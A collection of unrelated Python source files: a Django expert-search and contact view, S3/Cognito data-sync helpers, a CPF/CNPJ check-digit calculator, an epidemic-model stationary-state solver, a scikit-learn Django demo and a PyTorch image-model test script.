"other_mountain_ranges_of_research_interest", "other_mountain_ranges_of_research_expertise"
]
expertise_fields = fields_for_model(
Expertise,
exclude=other_expertise_fields + [
"user",
"mountain_ranges_of_research_expertise",
"mountain_ranges_of_research_interest"
]
)
name = self.request.GET.get("name", "")
expertise = self.request.GET.getlist("expertise", [])
regions_of_expertise = self.request.GET.getlist("mountain_ranges_of_research_expertise", [])
regions_of_interest = self.request.GET.getlist("mountain_ranges_of_research_interest", [])
official_functions = self.request.GET.get("official_functions", "")
career_stages = self.request.GET.getlist("career_stage", [])
affiliation = self.request.GET.get("affiliation", "")
country = self.request.GET.get("country", "")
form_data = non_zero_keys({
field_name: self.request.GET.get(field_name, "") if not isinstance(field, ModelMultipleChoiceField)
else self.request.GET.getlist(field_name, [])
for field_name, field in expertise_fields.items()
} if not expertise else classify_expertise(expertise))
queryset = get_user_model().objects.annotate(full_name=Concat(F("first_name"), Value(" "), F("last_name")))
query = Q()
for field in form_data:
query |= Q_if_truthy(**{f"expertise__{field}__title__in": form_data[field]})
for field in map(lambda s: f"expertise__{s}__icontains", other_expertise_fields):
query |= Q_if_truthy(**{field: " ".join(expertise)})
query |= Q_if_truthy(full_name__icontains=name)
query |= Q_if_truthy(official_functions__icontains=official_functions)
query |= Q_if_truthy(affiliations__name__icontains=affiliation)
query |= Q_if_truthy(affiliations__country=country)
query |= Q_if_truthy(projects__country=country)
query |= Q_if_truthy(career_stage__in=career_stages)
query |= Q_if_truthy(expertise__mountain_ranges_of_research_expertise__name__in=regions_of_expertise)
query |= Q_if_truthy(
expertise__other_mountain_ranges_of_research_expertise__icontains=" ".join(regions_of_expertise)
)
query |= Q_if_truthy(expertise__mountain_ranges_of_research_interest__name__in=regions_of_interest)
query |= Q_if_truthy(
expertise__other_mountain_ranges_of_research_interest__icontains=" ".join(regions_of_interest)
)
return queryset.filter(query & Q(is_public=True)).distinct() if query else queryset.none()
class Contact(TitleMixin, generic.FormView):
template_name = "expert_management/contact.html"
form_class = ContactForm
title = "Contact"
success_url = "contact"
def get_success_url(self):
return reverse_lazy("contact", args=[self.kwargs["username"]])
def get(self, request, *args, **kwargs):
get_object_or_404(User, username=kwargs["username"]).email
return super().get(request, *args, **kwargs)
def form_valid(self, form):
email, body, *_ = form.cleaned_data.values()
self.send_email(email, body)
return super().form_valid(form)
def send_email(self, email, body):
try:
recepient_email = get_object_or_404(User, username=self.kwargs["username"]).email
email = EmailMessage(
subject=f'Message from {get_current_site(self.request).name}',
body=body,
to=[recepient_email],
reply_to=[email]
)
email.send(fail_silently=False)
except Exception as e:
logger.exception(e)
messages.add_message(self.request, messages.ERROR, 'An error occurred while sending email', 'danger')
else:
messages.add_message(self.request, messages.SUCCESS, 'Message sent successfully')
|
import gzip
import json
import os
import time
from pathlib import Path
import boto3
COGNITO_STAGING_POOL = os.getenv("COGNITO_STAGING_POOL", "eu-west-1_mAQcge0PR")
DATA_LOCATION = os.getenv("BIOMAGE_DATA_PATH", "./data")
PULL = "PULL"
class Summary(object):
"""
Utility singleton class used to report which files have been updated as a result of
a given data management command.
"""
changed_files = []
cmd = ""
origin = ""
experiment_id = ""
@classmethod
def set_command(cls, cmd, origin, experiment_id):
cls.cmd = cmd
cls.origin = origin
cls.experiment_id = experiment_id
@classmethod
def add_changed_file(cls, file):
cls.changed_files.append(file)
@classmethod
def report_changes(cls):
print(f"From {cls.origin}")
print(f" * experiment {cls.experiment_id:^40s} -> {cls.cmd:>10s}")
if len(cls.changed_files) < 1:
print("Already up to date.")
return
print("Changes:")
for file in cls.changed_files:
print(f"{file:<70s} | Updated")
def save_cfg_file(dictionary, dst_file):
local_file = os.path.join(DATA_LOCATION, dst_file)
# try to create experiment folder, ignores if already exists (same as mkdir -p)
Path(os.path.dirname(local_file)).mkdir(parents=True, exist_ok=True)
with open(local_file, "w") as f:
# We sort & indent the result to make it easier to inspect & debug the files
# neither sorting nor indentation is used to check if two confis are equal
json.dump(dictionary, f)
# If the config file was found => retun (config file, true)
# Otherwise => (None, False)
def load_cfg_file(file):
filepath = os.path.join(DATA_LOCATION, file)
if os.path.exists(filepath) and not os.path.getsize(filepath) == 0:
with open(os.path.join(DATA_LOCATION, file)) as f:
return json.load(f), True
return None, False
def set_modified_date(file_location, date):
"""
Change the last-modified file parameter to date
"""
mod_time = time.mktime(date.timetuple())
os.utime(file_location, (mod_time, mod_time))
def get_local_S3_path(key):
return os.path.join(DATA_LOCATION, key)
def is_modified(obj, key):
"""
We check if the file in S3 has changed by comparing the last modified date
which should be enough for our goals.
Using E-tags would require either to download the file anyway to compute it or
storing them in a local DB which seemed too complex. Moreover, there isn't a
standard e-tag computation readily available and they can change among buckets,
regions, etc...
so it does not seem worth it.
"""
local_file = get_local_S3_path(key)
if not os.path.exists(local_file):
return True
if int(obj.last_modified.strftime("%s")) != int(os.path.getmtime(local_file)):
return True
return False
def download_S3_rds(s3_obj, key, filepath):
local_file = get_local_S3_path(filepath)
# try to create experiment folder, ignores if already exists (same as mkdir -p)
Path(os.path.dirname(local_file)).mkdir(parents=True, exist_ok=True)
with gzip.open(local_file, "wb") as f:
f.write(s3_obj.get()["Body"].read())
set_modified_date(file_location=local_file, date=s3_obj.last_modified)
def download_S3_json(s3_obj, key, filepath):
local_file = get_local_S3_path(filepath)
# try to create experiment folder, ignores if already exists (same as mkdir -p)
Path(os.path.dirname(local_file)).mkdir(parents=True, exist_ok=True)
s3_obj.download_file(local_file)
set_modified_date(file_location=local_file, date=s3_obj.last_modified)
def get_cognito_username(email):
client = boto3.client("cognito-idp")
user_name = client.admin_get_user(Username=email, UserPoolId=COGNITO_STAGING_POOL)[
"Username"
]
return user_name
def get_experiment_project_id(experiment_id, source_table):
table = boto3.resource("dynamodb").Table(source_table)
project_id = table.get_item(
Key={"experimentId": experiment_id}, ProjectionExpression="projectId"
).get("Item")["projectId"]
return project_id
def add_user_to_rbac(user_name, cfg):
if "rbac_can_write" in cfg:
if user_name not in cfg["rbac_can_write"]["SS"]:
cfg["rbac_can_write"]["SS"].append(user_name)
for val in cfg.values():
if isinstance(val, dict):
add_user_to_rbac(user_name, val)
def add_env_user_to_experiment(cfg):
email = os.getenv("BIOMAGE_EMAIL")
if not email:
raise ValueError(
"biomage email not available to patch experiment permissions."
+ ' Set the environment variable "BIOMAGE_EMAIL" with the email you use to log in into cellenics'
+ " and try again."
)
user_name = get_cognito_username(email=email)
add_user_to_rbac(user_name=user_name, cfg=cfg)
return cfg
|
import time
import ctypes
from multiprocessing import Process, Manager
from multiprocessing.sharedctypes import Array
ARQUIVO = "BASEPROJETO.txt"
PESOS_CPF_PRIMEIRO_DIGITO = [10, 9, 8, 7, 6, 5, 4, 3, 2]
PESOS_CPF_SEGUNDO_DIGITO = [11, 10, 9, 8, 7, 6, 5, 4, 3, 2]
PESOS_CNPJ_PRIMEIRO_DIGITO = [5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2]
PESOS_CNPJ_SEGUNDO_DIGITO = [6, 5, 4, 3, 2, 9, 8, 7, 6, 5, 4, 3, 2]
NUM_PROCESSOS = 4
def processa_cpf_cnpj(dado, primeiro_peso, segundo_peso):
"""Calcula o digito verificador do CPF ou CNPJ
Arguments:
dado {str} -- [O CPF/CNPJ sem o digito verificador]
primeiro_peso {list} -- O peso de cada algarismo para o CPF/CNPJ sem digito verificador
segundo_peso {list} -- O peso de cada algarismo para o CPF/CNPJ com o primeiro digito verificador calculado
Returns:
str -- CPF/CNPJ completo
"""
soma_primeiro_digito = 0
for algarismo, peso in zip(dado, primeiro_peso):
soma_primeiro_digito += int(algarismo) * peso
if soma_primeiro_digito % 11 < 2:
primeiro_digito = 0
else:
primeiro_digito = 11 - (soma_primeiro_digito % 11)
dado = dado + str(primeiro_digito)
soma_segundo_digito = 0
for algarismo, peso in zip(dado, segundo_peso):
soma_segundo_digito += int(algarismo) * peso
if soma_segundo_digito % 11 < 2:
segundo_digito = 0
else:
segundo_digito = 11 - (soma_segundo_digito % 11)
dado = dado + str(segundo_digito)
return dado
def processa_dado(dados, thread_number, cpf_completo, cnpj_completo):
"""Decide qual pedaço da lista cada thread irá pegar e define onde o dado sera armazenado,
CPFs vão para lista de CPF e CNPJs para a lista de CNPJs
Arguments:
dados {list} -- Lista com todos os dados
thread_number {int} -- O numero do processo, para definir qual pedaço da lista ele pegará
cpf_completo {list} -- Lista para armazenar o CPF
cnpj_completo {type} -- Lista para armazenar o CNPJ
"""
slice_por_thread = int(len(dados)/NUM_PROCESSOS)
inicio = int(thread_number * slice_por_thread)
for dado in dados[inicio:inicio + slice_por_thread]:
if len(dado) == 9:
cpf_completo.append(processa_cpf_cnpj(dado, PESOS_CPF_PRIMEIRO_DIGITO,
PESOS_CPF_SEGUNDO_DIGITO))
# print(f'CPF: {dado}')
elif len(dado) == 12:
cnpj_completo.append(processa_cpf_cnpj(dado, PESOS_CNPJ_PRIMEIRO_DIGITO,
PESOS_CNPJ_SEGUNDO_DIGITO))
# print(f'CNPJ {dado}')
else:
print(f'{dado} não tem a quantidade correta de algarismos')
def get_conteudo_arquivo():
"""Lê todas as linhas da base de dados e retorna uma lista com cada linha
Returns:
list -- Cada linha da base de dados é um elemento da lista
"""
with open(ARQUIVO, 'r') as arq:
cadastros_pessoas = [line.strip(' ').strip('\n')
for line in arq.readlines()]
return cadastros_pessoas
def gera_arquivo_completo(cpf_completo, cnpj_completo):
"""Gera um output com todos os CPFs e todos CNPJs nessa respectiva ordem
Arguments:
cpf_completo {list} -- Lista com todos CPFs para escrever
cnpj_completo {list} -- Lista com todos CNPJs para escrever
"""
with open('output.txt', 'w') as arq:
for cpf in cpf_completo:
arq.write(f'{cpf}\n')
for cnpj in cnpj_completo:
arq.write(f'{cnpj}\n')
def main():
start = time.time()
print("********* Inicia o processo *********")
print("Coletando dados do arquivo de texto")
dados = get_conteudo_arquivo()
print("Iniciando calculo dos digitos verificadores")
with Manager() as manager:
cpf_completo = manager.list()
cnpj_completo = manager.list()
processes = []
for i in range(NUM_PROCESSOS):
p = Process(target=processa_dado, args=(dados, i, cpf_completo, cnpj_completo)) # Passing the list
p.start()
processes.append(p)
for p in processes:
p.join()
fim_processamento = (time.time() - start)
print(f'Tempo cálculo da base de dados: {fim_processamento:.3f} segundos')
cpf_completo = list(cpf_completo)
cnpj_completo = list(cnpj_completo)
print("Iniciando geração do arquivo final")
gera_arquivo_completo(cpf_completo, cnpj_completo)
fim_geracao = (time.time() - start - fim_processamento)
print(f'Tempo geração do arquivo: {fim_geracao:.3f} segundos')
fim_tudo = (time.time() - start)
print("********* Fim do processo *********")
print(f'Tempo de execução total: {fim_tudo:.3f} segundos')
if __name__ == "__main__":
main()
|
<gh_stars>0
# -*- coding: utf-8 -*-
"""
This module provides functions to obtain the stationary state solutions.
"""
import numpy as np
from .ode import *
from scipy.integrate import ode
from scipy.optimize import brentq
from numba import jit
import numba as nb
def stable_branch(beta, state_meta, param_init, param_var, fixed_args=(),
h=0.01, rtol=10**(-8), Jtol=10**(-2),
min_density=10**(-4),max_iter=1000, verbose=True):
"""stable_branch captures the non-trivial stable branch starting from
some initial parameter until the bifurcation.
IMPORTANT : it is assumed that the direction of the parameter variation
is such that the system goes toward a bifurcation. At the
bifurcation, it is expected that the Jacobian J_r = 1.
It is also assumed that J_r < 1, since we are targetting
a stable branch.
We converge the stationary state at the current parameter value. We
then vary the parameter. If the Jacobian J_r varies by a value more than
Jtol/2, we adapt the parameter variation value until it respects it.
With this adaptive parameter variation, we ensure that we will not miss
the bifurcation, which serves as a stopping criterion.
:param beta: function of two argument (n,i) or more (parameters) for the
infection rate
:param state_meta: StateMeta object encoding the information of the
structure.
:param param_init: float for the initial value of the parameter to vary
:param param_var: float (positive or negative) for the parameter variation
:param fixed_args: tuple of extra arguments for beta that are fixed.
:param h: float for the step size of the linearly implicit Euler.
:param rtol: float for the relative variation desired on the convergence.
:param Jtol: float for tolerance on Jacobian variation for stability
:param min_density: float for the minimal infected fraction allowed
:param max_iter: int for the maximum number of iteration to converge.
:param verbose: bool indicating wheter or not to print Jacobian & parameter
:returns stable_branch: tuple of parameter list, state list and infected
fraction list for the stable branch
"""
if verbose:
print("Entering the stable_branch method")
print("---------------------------------")
nmax = state_meta[1]
gm = state_meta[3]
param_list = []
stationary_state_list = []
infected_fraction_list = []
#for the first state, we use the ODE directly
param = param_init
sm,fni = initialize(state_meta, initial_density=0.9)
inf_mat = infection_matrix(beta,nmax,args=(param_init,*fixed_args))
r0 = mf_from_state(fni,inf_mat,state_meta)
r = stationary_state(r0,inf_mat,state_meta,stable=True,
h=h,rtol=rtol,max_iter=max_iter,
verbose=verbose)
sm,fni = unflatten(state_from_mf(r,inf_mat,state_meta),state_meta)
param_list.append(param)
stationary_state_list.append((sm,fni))
infected_fraction_list.append(infected_fraction(sm,gm))
#hereafter we use the stationary_state method
branch_stable = True
current_param_var = param_var*1.
while branch_stable:
r0 = mf_from_state(fni,inf_mat,state_meta)
J0 = jac_mf_map(r0,inf_mat,state_meta)
if verbose:
print(f"Jacobian value at : {J0}, parameter : {param}, mean-field :{r0}")
I0 = infected_fraction(sm,gm)
if (-(J0 - 1) >= Jtol and I0 > min_density) : #far enough from bifurcation
step_small_enough = False
while not step_small_enough:
param += current_param_var
inf_mat = infection_matrix(beta,nmax,args=(param,*fixed_args))
r = stationary_state(r0,inf_mat,state_meta,stable=True,
h=h,rtol=rtol,max_iter=max_iter,
verbose=verbose)
J = jac_mf_map(r,inf_mat,state_meta)
if abs(J - J0) <= Jtol/2:
step_small_enough = True
if abs(J - J0) <= Jtol/10:
#step probably too small
current_param_var *= 2
else:
param -= current_param_var
current_param_var /= 2
if verbose:
print(f"Jacobian difference too big : {abs(J-J0)}")
print(f"Reducing parameter variation : {current_param_var}")
sm,fni = unflatten(state_from_mf(r,inf_mat,state_meta),state_meta)
param_list.append(param)
stationary_state_list.append((sm,fni))
infected_fraction_list.append(infected_fraction(sm,gm))
else:
branch_stable = False
return (param_list,stationary_state_list,infected_fraction_list)
def unstable_branch(fni, beta, state_meta, param_init, param_var, fixed_args=(),
init_iter=10, h=0.01, rtol=10**(-8), Jtol=10**(-2),
min_density=10**(-4),max_iter=1000, verbose=True):
"""unstable_branch captures the non-trivial unstable branch starting from
some initial parameter until the bifurcation.
IMPORTANT : it is assumed that the direction of the parameter variation
is such that the system goes toward a bifurcation. At the
bifurcation, it is expected that the Jacobian J_r = 1.
It is also assumed that J_r > 1, since we are targetting
an unstable branch.
We converge the stationary state at the current parameter value. We
then vary the parameter. If the Jacobian J_r varies by a value more than
Jtol/2, we adapt the parameter variation value until it respects it.
With this adaptive parameter variation, we ensure that we will not miss
the bifurcation, which serves as a stopping criterion.
Note : it is recommended to seed the algo with fni obtained from the
nearby stable branch
:param fni: array for the initial state of the groups
:param beta: function of two argument (n,i) or more (parameters) for the
infection rate
:param state_meta: StateMeta object encoding the information of the
structure.
:param param_init: float for the initial value of the parameter to vary
:param param_var: float (positive or negative) for the parameter variation
:param fixed_args: tuple of extra arguments for beta that are fixed.
:param init_iter: int for the number of initial iteration without checking
the Jacobian. It is necessary, since we already start
near a bifurcation and wouldn't want an early stop.
:param h: float for the step size of the linearly implicit Euler.
:param rtol: float for the relative variation desired on the convergence.
:param Jtol: float for tolerance on Jacobian variation for stability
:param min_density: float for the minimal infected fraction allowed
:param max_iter: int for the maximum number of iteration to converge.
:param verbose: bool indicating wheter or not to print Jacobian & parameter
:returns unstable_branch: tuple of parameter list, state list and infected
fraction list for the unstable branch
"""
if verbose:
print("Entering the unstable_branch method")
print("-----------------------------------")
nmax = state_meta[1]
gm = state_meta[3]
param_list = []
stationary_state_list = []
infected_fraction_list = []
#for the first state, we use the provided fni as proxy
param = param_init
inf_mat = infection_matrix(beta,nmax,args=(param_init,*fixed_args))
r0 = mf_from_state(fni, inf_mat, state_meta)*0.95 #we perturbe it a little
r = stationary_state(r0,inf_mat,state_meta,stable=False,
h=h,rtol=rtol,max_iter=max_iter)
# r = stationary_state_safe(inf_mat, state_meta, r_upp=r0, r_low=10**(-14))
sm,fni = unflatten(state_from_mf(r,inf_mat,state_meta),state_meta)
param_list.append(param)
stationary_state_list.append((sm,fni))
infected_fraction_list.append(infected_fraction(sm,gm))
branch_unstable = True
current_param_var = param_var*1.
it = 0
while branch_unstable or it < init_iter:
it += 1
r0 = mf_from_state(fni,inf_mat,state_meta)
J0 = jac_mf_map(r0,inf_mat,state_meta)
if verbose:
print(f"Jacobian value at : {J0}, parameter : {param}, mean-field :{r0}")
I0 = infected_fraction(sm,gm)
if ((J0 - 1) >= Jtol and I0 > min_density) or it < init_iter:
step_small_enough = False
while not step_small_enough:
param += current_param_var
inf_mat = infection_matrix(beta,nmax,args=(param,*fixed_args))
r = stationary_state(r0,inf_mat,state_meta,stable=False,
h=h,rtol=rtol,max_iter=max_iter,
verbose=verbose)
# r = stationary_state_safe(inf_mat, state_meta, r_upp=r0, r_low=10**(-14))
J = jac_mf_map(r,inf_mat,state_meta)
if abs(J - J0) <= Jtol/2:
step_small_enough = True
if abs(J - J0) <= Jtol/10:
#step probably too small
current_param_var *= 2
else:
param -= current_param_var
current_param_var /= 2
if verbose:
print(f"Jacobian difference too big : {abs(J-J0)}")
print(f"Reducing parameter variation : {current_param_var}")
sm,fni = unflatten(state_from_mf(r,inf_mat,state_meta),state_meta)
param_list.append(param)
stationary_state_list.append((sm,fni))
infected_fraction_list.append(infected_fraction(sm,gm))
else:
branch_unstable = False
return (param_list,stationary_state_list,infected_fraction_list)
@jit(nopython=True)
def stationary_state(r0, inf_mat, state_meta, stable=True,
h=0.01, rtol=10**(-12), max_iter=5000, verbose=True):
"""stationary_state uses the self-consistent relation to find a fixed
point (stationary state).
We consider a transformed system of ODE
dr/dt = sgn*(M(r) - r)
where M(r) is the map used to calculate the stationary state value
of the mean-field r. The sgn (-1, 1) is used to target unstable/stable
fixed points of the system.
We use a linearly implicit Euler method to solve the above transformed ODE
r_{t+h} ~ r_t + sgn*(M(r) - r)/(1/h - sgn*(J_r(r) - 1))
In this case, a fixed point is stable if the jacobian of the mean-field
self-consistent equation J_r < 1, whereas it is unstable if J_r > 1.
:param r0: float for the initial mean-field value
:param inf_mat: array of shape (nmax+1,nmax+1) representing the infection rate
:param state_meta: tuple of arrays encoding information of the structure.
:param stable: bool indicating if the targeted stationary state is stable
or unstable.
:param h: float for the step size of the linearly implicit Euler.
:param rtol: float for the relative variation desired on the convergence.
:param max_iter: int for the maximum number of iteration to converge.
return r: float for the converged mean-field
"""
if stable:
sgn = 1
else:
sgn = -1
converged = False
it = 0
r = r0
while not converged and it < max_iter:
it += 1
diff = mf_map(r, inf_mat, state_meta) - r
rnew = r + sgn*diff/\
((abs(diff)+10**(-12))/h - sgn*(jac_mf_map(r, inf_mat, state_meta) - 1))
if abs(rnew/r-1) <= rtol:
converged = True
r = rnew
return r
def stationary_state_safe(inf_mat, state_meta, r_upp=None, r_low=10**(-12)):
"""stationary_state uses the self-consistent relation to find a fixed
point (stationary state). It uses a safe brentq routine.
:param inf_mat: array of shape (nmax+1,nmax+1) representing the infection rate
:param state_meta: tuple of arrays encoding information of the structure.
return r: float for the converged mean-field
"""
if r_upp is None:
sm,fni = initialize(state_meta, initial_density=0.99)
r_upp_ = mf_from_state(fni,inf_mat,state_meta)
else:
r_upp_ = r_upp
r = brentq(mf_root_equation,r_low,r_upp_,args=(inf_mat,state_meta))
return r
@jit(nopython=True)
def mf_from_state(fni,inf_mat,state_meta):
imat = state_meta[5]
nmat = state_meta[6]
pnmat = state_meta[7]
r = np.sum(inf_mat[2:,:]*(nmat[2:,:]-imat[2:,:])*fni[2:,:]*pnmat[2:,:])
r /= np.sum((nmat[2:,:]-imat[2:,:])*fni[2:,:]*pnmat[2:,:])
return r
@jit(nopython=True)
def state_from_mf(r,inf_mat,state_meta):
nmax = state_meta[1]
m = state_meta[2]
gm = state_meta[3]
pn = state_meta[4]
#get node state
sm = (1/(1+m*r))
rho = r*excess_susceptible_membership(m,gm,sm)
#get groups state
fni = np.zeros((nmax+1,nmax+1),dtype=np.float64)
for n in range(2, nmax+1):
if pn[n] > 0:
fni[n][0] = 1
for i in range(n):
#unnormalized assignation
fni[n][i+1] += ((n-i)*(rho+inf_mat[n][i])+i)*fni[n][i]/(i+1)
if i > 0:
fni[n][i+1] -= (n-i+1)*(inf_mat[n][i-1]+rho)*fni[n][i-1]/(i+1)
#normalize
fni[n] /= np.sum(fni[n])
return flatten(sm,fni,state_meta)
@jit(nopython=True)
def mf_map(r, inf_mat, state_meta):
"""mf_map takes a mean-field r as argument and return a mean-field r
:param r: float representing a mean-field value
:param inf_mat: array of shape (nmax+1,nmax+1) representing the infection
rate
:param state_meta: tuple of arrays encoding information of the structure.
"""
v = state_from_mf(r,inf_mat,state_meta)
mmax = state_meta[0]
nmax = state_meta[1]
fni = v[mmax+1:].reshape((nmax+1,nmax+1))
return mf_from_state(fni,inf_mat,state_meta)
@jit(nopython=True)
def mf_root_equation(r, inf_mat, state_meta):
"""mf_root_equation is the function that needs to be equal 0 for a
stationary state
:param r: float representing a mean-field value
:param inf_mat: array of shape (nmax+1,nmax+1) representing the infection
rate
:param state_meta: tuple of arrays encoding information of the structure.
"""
return mf_map(r, inf_mat, state_meta) - r
@jit(nopython=True)
def jac_mf_map_(r, inf_mat, state_meta, eps=10**(-8)):
r2 = mf_map(r+eps,inf_mat,state_meta)
r1 = mf_map(r,inf_mat,state_meta)
return (r2-r1)/eps
@jit(nopython=True)
def jac_mf_map(r, inf_mat, state_meta):
"""jac_mf_map takes a mean-field r as argument and return the jacobian
Note : it assumes we are at a fixed point (stationary state)
:param r: float representing a mean-field value
:param inf_mat: array of shape (nmax+1,nmax+1) representing the infection
rate
:param state_meta: tuple of arrays encoding information of the structure.
"""
mmax = state_meta[0]
nmax = state_meta[1]
m = state_meta[2]
gm = state_meta[3]
pn = state_meta[4]
imat = state_meta[5]
nmat = state_meta[6]
pnmat = state_meta[7]
v = state_from_mf(r,inf_mat,state_meta)
sm = v[:mmax+1]
fni = v[mmax+1:].reshape((nmax+1,nmax+1))
rho = r*excess_susceptible_membership(m,gm,sm)
#calculate dfni and drdrho
dni = np.zeros((nmax+1,nmax+1))
for n in range(2,nmax+1):
for i in range(1,n+1):
dni[n][i] = np.sum(1/(inf_mat[n][:i]+rho))
dfni = -fni*np.outer(np.sum(fni[:,1:]*dni[:,1:],axis=1),np.ones(nmax+1)) + fni*dni
u = np.sum(inf_mat*(nmat-imat)*fni*pnmat)
v = np.sum((nmat-imat)*fni*pnmat)
du = np.sum(inf_mat*(nmat-imat)*dfni*pnmat)
dv = np.sum((nmat-imat)*dfni*pnmat)
drdrho = du/v-u*dv/v**2
#calculate dsm and drhodr
dsm = -m/(1+m*r)**2
u = np.sum(m*(m-1)*sm*gm)
v = np.sum(m*sm*gm)
du = np.sum(m*(m-1)*dsm*gm)
dv = np.sum(m*dsm*gm)
drhodr = u/v + r*(du/v - u*dv/v**2)
return drdrho*drhodr
|
<gh_stars>0
from django.shortcuts import render, get_object_or_404
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from .models import Project
from .forms import DataForm
from django.contrib.auth.models import User
from django.views.generic import ListView, DetailView, CreateView, UpdateView, DeleteView
# from django.utils.inspect import get_func_full_args
# import inspect
from random import choice
from django.shortcuts import render
import numpy as np
import pandas as pd
from sklearn.linear_model import LogisticRegression
from sklearn.naive_bayes import GaussianNB
from sklearn.svm import SVC
from sklearn.datasets import load_iris
from sklearn.model_selection import train_test_split
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import Normalizer
from sklearn.preprocessing import MultiLabelBinarizer
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier
from tpot.builtins import StackingEstimator
global df
iris = load_iris()
df = pd.DataFrame(data= np.c_[iris['data'], iris['target']], columns= iris['feature_names'] + ['target'])
training_features, testing_features, training_target, testing_target = train_test_split(iris.data, iris.target,
random_state=None)
titanic = pd.read_csv('train.csv')
titanic.rename(columns={'Survived': 'target'}, inplace=True)
titanic['Sex'] = titanic['Sex'].map({'male':0,'female':1})
titanic['Embarked'] = titanic['Embarked'].map({'S':0,'C':1,'Q':2})
titanic = titanic.fillna(-999)
titanic_new = titanic.drop(['Name', 'Ticket', 'Cabin', 'target'], axis=1)
features = titanic_new
training_features_x, testing_features_x, training_classes_x, testing_classes_x = train_test_split(features,
titanic['target'],
random_state=None)
X, y = pd.DataFrame(data=iris.data, columns=iris.feature_names), pd.DataFrame(data=iris.target, columns=["iris_type"])
X_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)
y_train, y_test = np.ravel(y_train), np.ravel(y_test)
def on_iris():
# Average CV score on the training set was: 0.9818181818181818
exported_pipeline = make_pipeline(
Normalizer(norm="l1"),
StackingEstimator(estimator=LogisticRegression(C=0.0001, dual=False, penalty="l2")),
DecisionTreeClassifier(criterion="gini", max_depth=7, min_samples_leaf=14, min_samples_split=6)
)
exported_pipeline.fit(training_features, training_target)
return exported_pipeline
def on_titanic():
exported_pipeline = RandomForestClassifier(bootstrap=False, max_features=0.4, min_samples_leaf=1,
min_samples_split=9)
exported_pipeline.fit(training_features_x, training_classes_x)
return exported_pipeline
def output_auto(request):
func_chosen = choice([on_iris, on_titanic])
if func_chosen == on_iris:
results = on_iris().predict(testing_features)
df_name = 'Iris'
html_table = df.head().to_html(index=False)
else:
results = on_titanic().predict(testing_features_x)
df_name = 'Titanic'
html_table = titanic_new.head().to_html(index=False)
return render(request, 'cybiteml/home.html', {'results': results, 'html_table': html_table, 'df_name': df_name})
def home(request):
if request.method == 'POST':
form = DataForm(request.POST)
if form.is_valid():
size = form.cleaned_data['size']
missing_q = form.cleaned_data['missing_q']
missing_val = form.cleaned_data['missing_val']
algo = form.cleaned_data['algo']
if size == 'head':
if missing_q == 'yes':
df.fillna(missing_val, inplace=True)
size_choice = df.head(10)
else:
size_choice = df.head(10)
else:
if missing_q == 'yes':
df.fillna(missing_val, inplace=True)
size_choice = df
else:
size_choice = df
size_choice = size_choice.to_html(index=False)
if algo == 'gnb':
model = GaussianNB()
model.fit(X_train, y_train)
y_pred = model.predict(X_test)
score = model.score(X_test, y_test)
return render(request, 'cybiteml/home.html', {'disp_df': size_choice,
'y_pred': y_pred, 'score': score})
elif algo == 'lrc':
logreg = LogisticRegression(random_state=0, solver="lbfgs",max_iter=400, multi_class="multinomial")
logreg.fit(X_train, y_train)
y_pred = logreg.predict(X_test)
score = logreg.score(X_test, y_test)
return render(request, 'cybiteml/home.html',
{'disp_df': size_choice, 'y_pred': y_pred, 'score': score})
else:
svc = SVC(kernel="linear", C=1.0, gamma="auto")
svc.fit(X_train, y_train)
y_pred = svc.predict(X_test)
score = svc.score(X_test, y_test)
return render(request, 'cybiteml/home.html',
{'disp_df': size_choice, 'y_pred': y_pred, 'score': score})
else:
form = DataForm()
return render(request, 'cybiteml/home.html', {'form': form})
class UserProjectListView(ListView):
model = Project
template_name = 'cybiteml/user_projects.html'
context_object_name = 'projects'
paginate_by = 2
def get_queryset(self):
user = get_object_or_404(User, username=self.kwargs.get('username'))
return Project.objects.filter(creator=user).order_by('-date_created')
class ProjectDetailView(DetailView):
model = Project
class ProjectCreateView(LoginRequiredMixin, CreateView):
model = Project
fields = ['title', 'description', 'file']
def form_valid(self, form):
form.instance.creator = self.request.user
return super().form_valid(form)
class ProjectUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Project
fields = ['title', 'description', 'file']
def form_valid(self, form):
form.instance.creator = self.request.user
return super().form_valid(form)
def test_func(self):
project=self.get_object()
if self.request.user == project.creator:
return True
else:
return False
class ProjectDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Project
success_url = '/'
def test_func(self):
project=self.get_object()
if self.request.user == project.creator:
return True
else:
return False
|
<reponame>nrupatunga/pytorch-deaf
"""
File: test_new.py
Author: Nrupatunga
Email: <EMAIL> Github: https://github.com/nrupatunga
Description: Test script
"""
import argparse
import cv2
import matplotlib.pyplot as plt
import numpy as np
import torch
from scipy.fftpack import fft2, ifft2
from litdeaf import deafLitModel
from src.utility.psf2otf import psf2otf
SCALE_INPUT = 0.5
def get_h_input(S):
h = np.diff(S, axis=1)
last_col = S[:, 0, :] - S[:, -1, :]
last_col = last_col[:, np.newaxis, :]
h = np.hstack([h, last_col])
return h / SCALE_INPUT
def get_v_input(S):
v = np.diff(S, axis=0)
last_row = S[0, ...] - S[-1, ...]
last_row = last_row[np.newaxis, ...]
v = np.vstack([v, last_row])
return v / SCALE_INPUT
def get_outputs(ckpt_path, img_path, gpu=True):
S_out = []
S = cv2.imread(img_path) / 255.
S_out.append(S)
for i in range(2):
if i == 0:
h_input = get_h_input(S)
data_in = np.transpose(h_input, [1, 0, 2])
else:
v_input = get_v_input(S)
data_in = v_input
data = np.transpose(data_in, [2, 0, 1])
data = data - 8.8276e-7
data = data / 0.1637
data = torch.tensor(data).unsqueeze(0)
data = data.float()
# Model loading from checkpoint
if gpu:
model = deafLitModel.load_from_checkpoint(ckpt_path).cuda()
else:
model = deafLitModel.load_from_checkpoint(ckpt_path,
map_location=torch.device('cpu'))
model.eval()
model.freeze()
if gpu:
output = model._model(data.cuda()).squeeze().cpu().numpy()
else:
output = model._model(data).squeeze().numpy()
output = np.transpose(output, [1, 2, 0])
out = np.zeros_like(data_in)
out[4:4 + output.shape[0], 4:4 + output.shape[1], :] = output
if i == 1:
final_out = np.hstack((S_out[0], out))
S_out.append(out)
else:
data_in = np.transpose(data_in, [1, 0, 2])
out = np.transpose(out, [1, 0, 2])
final_out = np.hstack((S_out[0], out))
S_out.append(out)
if False:
plt.imshow(final_out, cmap=plt.cm.Blues)
plt.draw()
